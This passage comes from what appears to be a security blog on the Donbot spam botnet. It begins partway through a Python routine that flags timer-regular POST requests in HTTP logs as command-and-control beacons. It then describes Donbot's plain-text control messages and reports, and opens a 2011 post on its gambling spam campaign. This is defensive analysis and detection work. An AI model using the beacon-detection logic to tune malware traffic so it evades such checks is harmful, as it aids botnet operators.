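MIN_HITS = 4          # assumption: need a few samples to estimate a period
MAX_JITTER = 0.10     # assumption: stdev/mean below this counts as "regular"


def parse_log(text):
    """Yield (ts, client, method, host, path) for each non-empty line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url = line.split()
        u = urlparse(url)
        yield datetime.fromisoformat(ts), client, method, u.hostname, u.path


def find_beacons(text, min_hits=MIN_HITS, max_jitter=MAX_JITTER):
    """Return (client, host, path, period_seconds) for regular POST series."""
    series = defaultdict(list)
    for ts, client, method, host, path in parse_log(text):
        if method == "POST":
            series[(client, host, path)].append(ts)
    hits = []
    for (client, host, path), stamps in series.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        # Low relative spread of the gaps is the signature of a timer.
        if period > 0 and pstdev(gaps) / period <= max_jitter:
            hits.append((client, host, path, round(period)))
    return hits


if __name__ == "__main__":
    for client, host, path, period in find_beacons(SAMPLE_LOG):
        print(f"{client} -> {host}{path} every ~{period}s")
```

Run against real logs, the same routine will also surface legitimate pollers (update checks, webmail refreshes), so the output is a lead to pivot on the host and path, not a verdict on its own; here it is the combination of a bare IP for a host, a fixed path and a 20-minute timer that matches what we saw from the bot.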

The control instructions and reports between the bot and its control server are all communicated in plain text.  Here, for example is part of the template used in the gambling spam campaign we discussed last week.

 

Donbot also sends regular reports back to the server, which include delivery success rates and whether the host is listed on any IP blacklist (RBL). Below you can see two characteristics of Donbot traffic, the HALLO and CHUNK messages:

The success of sending to individual email addresses is also recorded, so that the operator can continually clean his email address lists of ‘bad’ addresses.

In amongst the template instructions, there is also a bunch of text which looks like it is pulled from a Wiki somewhere. Although we didn’t see it being used in the gambling campaign, this may be for inserting random text into spam messages.

All this is very similar to what we have seen before from Donbot (see our original write-up here). What is interesting is its sudden rise from obscurity and its high output per host. Why build a fancy new spamming botnet when you can simply tweak some old ones?


Donbot’s “Money Maker” Gambling Scheme

By David Broome  •  May 26th, 2011  •   Spam

Last week, we observed the Donbot botnet change its spam campaign to one promoting online casinos. The barrage of Fake AV we had been seeing from Donbot suddenly stopped, and within 15 minutes we started receiving this new campaign.

The theme of the campaign is not entirely new, as it is one we have seen for over a year on and off in our spam traps. It is designed to encourage the reader to gamble money on roulette with what is presented as a ‘winning strategy’. Conveniently, a link to an online casino is provided to the user in order to use this strategy and make ‘easy money’.
